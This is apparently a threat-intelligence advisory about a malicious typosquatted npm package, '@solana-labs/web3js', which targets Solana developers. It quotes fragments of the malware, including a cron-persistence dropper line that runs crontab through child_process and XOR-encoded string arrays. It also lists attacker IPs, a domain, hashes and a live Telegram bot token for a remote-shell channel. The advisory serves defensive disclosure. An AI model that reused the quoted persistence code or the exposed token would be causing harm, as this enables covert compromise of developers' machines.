VDB

GCVE-110-OSM-2026-6

GCVE-110-OSM-2026-6
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published June 8, 2026
This is a typosquatting supply-chain attack impersonating the legitimate `@solana` namespace. The fake, copycat scoped namespace `@solana-labs` is published by a throwaway account (`tihiwa5354@bncinema.com`) that also controls seven other Solana-themed squats. The clearest smoking gun is the cron persistence dropper embedded in both `lib/index.cjs.js` and `lib/index.esm.js`: `writeFileSync(tf,cr); cp.execSync('(crontab -l 2>/dev/null|grep -v csync;cat '+tf+')|crontab -', {timeout:3000}); fs.unlink(...)` — a textbook download-execute-delete pattern that writes an attacker-controlled cron payload and installs it silently. Accompanying this is active system fingerprinting via `os.userInfo()` and `os.hostname()`, public IP resolution via `ifconfig.me`, and HTTP callbacks to the hardcoded attacker IP `104.239.66.223:8899`. XOR-encoded byte arrays (`var t=[93,108,109,124,...]`) obfuscate strings that likely include the C2 address or additional payload URL, consistent with the 'obfuscated-exfil' combo flagged by the static analyzer. The 17-version publishing burst across a single day, fake maintainer email, and publisher-controlled typosquat cluster confirm adversarial intent targeting Solana developers. **IOCs** - Domain: `bncinema.com` - URL: `https://104.239.66.223:8899` - IP: `104.239.66.223` --- ### Linked Telegram C2 (enrichment 2026-06-09) The operator behind this cluster also runs an active Telegram Bot-API command channel alongside the 104.239.66.223:8899 HTTP callback: - Bot: @N1gga1337bot ("AI AGENT V1", bot id 8628389567) — exposes a /sh <cmd> remote-shell grammar (/help, /sh). - Operator account: @B4ck7p ("LD", Telegram user id 8346336575). - Bot token (IOC, live at capture): 8628389567:AAHeoLi034Vg6JIXsC_vqP-v-PXH2FhZIG4 - Observed activity (UTC): 2026-06-07 14:20–21:40 — operator issued /sh uname -a host-recon commands. Added Telegram IOCs - Telegram bot token: 8628389567:AAHeoLi034Vg6JIXsC_vqP-v-PXH2FhZIG4 - Telegram bot: @N1gga1337bot (id 8628389567) - Telegram operator: @B4ck7p (id 8346336575) ENTRY lib/index.cjs.js (main: lib/index.cjs.js) PERSISTENCE - Cron Job Persistence in lib/index.cjs.js: "crontab -" - Cron Job Persistence in lib/index.esm.js: "crontab -" DESTINATION - custom-c2: EXFIL - Corporate Environment Targeting in lib/index.iife.js: "tmost min(nBitLen, outLen) bits, which match" - Data Encoding for Exfiltration in lib/index.browser.cjs.js: "Buffer.from(wireTransaction).toString('base64')" - Data Encoding for Exfiltration in lib/index.browser.esm.js: "Buffer.from(wireTransaction).toString('base64')" OBFUSCATION - Obfuscation: function to array replacements in lib/index.iife.js - String Array Obfuscation in lib/index.iife.js: "[ '0x428a2f98d728ae22', '0x7137449123ef65cd', '0xb5c0fbcfec4d3b2f', '0xe9b5dba58..." - Decoded Base64 Content in lib/index.cjs.js - Decoded Base64 Content in lib/index.esm.js - Obfuscation Pattern: charCodeChain in lib/index.iife.js: "charCodeAt(i)" - Deobfuscation Skipped (safety guard) in lib/index.browser.cjs.js (+5 more) ADDITIONAL FINDINGS - Download Execute Delete Pattern in lib/index.cjs.js: "writeFileSync(tf,cr);cp.execSync('(crontab -l 2>/dev/null|grep -v csync;cat '+tf..." - Dynamic Code Execution in lib/index.cjs.js: "exec( str )" - Shell Command Execution in lib/index.cjs.js: "require('child_process')" - XOR-Encoded String Arrays in lib/index.cjs.js: "var t=[93,108,109,124,121,113,123,122,89,81,61,82,71,70,69,65,84,71,60,88,71,67,..." - Brand New Package - Publisher Has Other Malicious Packages PAYLOAD FILES lib/index.esm.js (+ lib/index.cjs.js) INDICATORS (IOCs) - Domain: bncinema.com - URL: https://104.239.66.223:8899 - IP: 104.239.66.223 - urls: https://bargsten.org/jsts/enums/\nexport - sha256Hashes: c7176a703d4dd84fba3c0b760d10670f2a2053fa2c39ccc64ec7fd7792ac037a, 26e8958fc2b227b045c3f489f2ef98f0d5dfac05d3c63339b13802886d53fc05 - payloadFileHash: 6c0fffa159f7b4a14d32ea72f3acd9efaca19d582d8b0e33a80bf6608867df08

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknown@solana-labs/web3js1.98.112 (affected)
unknown@emilgroup/discount-sdk-nodeall (affected)
unknown@validates-sdk/v3all (affected), all (affected), * (affected), all (affected), all (affected), all (affected), * (affected), * (affected)
unknownty-config-providerall (affected), all (affected), all (affected), all (affected), * (affected), * (affected)

Browse GCVE Records

72,409 records in the GCVE database · Updated July 14, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›